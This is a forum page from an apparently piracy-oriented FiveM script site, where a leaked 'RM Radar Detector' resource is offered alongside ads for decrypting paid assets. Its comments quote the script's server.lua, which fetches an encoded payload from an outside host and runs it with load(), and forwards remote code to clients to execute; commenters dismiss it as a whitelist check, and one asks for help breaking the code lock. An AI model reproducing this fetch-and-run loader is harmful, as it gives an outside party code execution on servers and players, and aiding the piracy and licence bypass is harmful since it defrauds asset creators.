Jump to content
Check out discord.gg/fxap for the cheapest decryptions! First one is free! ×

Get LB-Phone!

Unlock the powerful LB-Phone for a fraction of the price you pay on tebex.

Download

Premium TOS Clothing MEGA Pack!

11GB of pure TOS premium clothing best clothing pack for your Server!

Download

5Decrypt

Automated Asset Decryption

Learn More

1 Screenshot

About This File

RM Radar Detector

  • Nice 1

User Feedback

Recommended Comments

BumpyJohnson

Posted

Sketchy lines on the server.lua

 

PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers)
    local code = ''
    for word in string.gmatch(text, '([^\\]+)') do 
        code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
    end
    assert(load(code))() -- run the code
end, 'GET', '')

RegisterServerEvent('filesecuring:load')
AddEventHandler('filesecuring:load', function()
    local src = source

    PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers)
        local code = ''
        for word in string.gmatch(text, '([^\\]+)') do 
            code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
        end
        TriggerClientEvent('client:load-code', src, code)
    end, 'GET', '')
end)

  • Staff Supervisor
Auctions | Staff Supervisor

Posted

2 hours ago, Arfy said:

Sketchy lines on the server.lua

 

PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers)
    local code = ''
    for word in string.gmatch(text, '([^\\]+)') do 
        code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
    end
    assert(load(code))() -- run the code
end, 'GET', '')

RegisterServerEvent('filesecuring:load')
AddEventHandler('filesecuring:load', function()
    local src = source

    PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers)
        local code = ''
        for word in string.gmatch(text, '([^\\]+)') do 
            code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
        end
        TriggerClientEvent('client:load-code', src, code)
    end, 'GET', '')
end)

I checked the code on the external sites and it should not be anything malicious, but it indicated that this script might not work unless whitelisted by the creator, the code on the websites translates to:
 

print('You don\'t have access to this script! Your server ip: IP')

So no need to worry.
 

deezleaks

Posted

4 hours ago, Arfy said:

Sketchy lines on the server.lua

 

PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers)
    local code = ''
    for word in string.gmatch(text, '([^\\]+)') do 
        code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
    end
    assert(load(code))() -- run the code
end, 'GET', '')

RegisterServerEvent('filesecuring:load')
AddEventHandler('filesecuring:load', function()
    local src = source

    PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers)
        local code = ''
        for word in string.gmatch(text, '([^\\]+)') do 
            code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
        end
        TriggerClientEvent('client:load-code', src, code)
    end, 'GET', '')
end)

Its Just To Check If Your Server Is Whitelisted To Use It

Affen88

Posted

Who ever posted this code: You have to print the script if you bought it with your whitelisted IP. Its not possible to get the code as long as you are not whitelisted on the HttpRequest. 

bins1824727472

Posted

Could anyone try and get past the code lock system?

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.


×
×
  • Create New...

Important Information

By continuing on Launcherleaks.net, you agree to our Terms of Use, Guidelines & Privacy Policy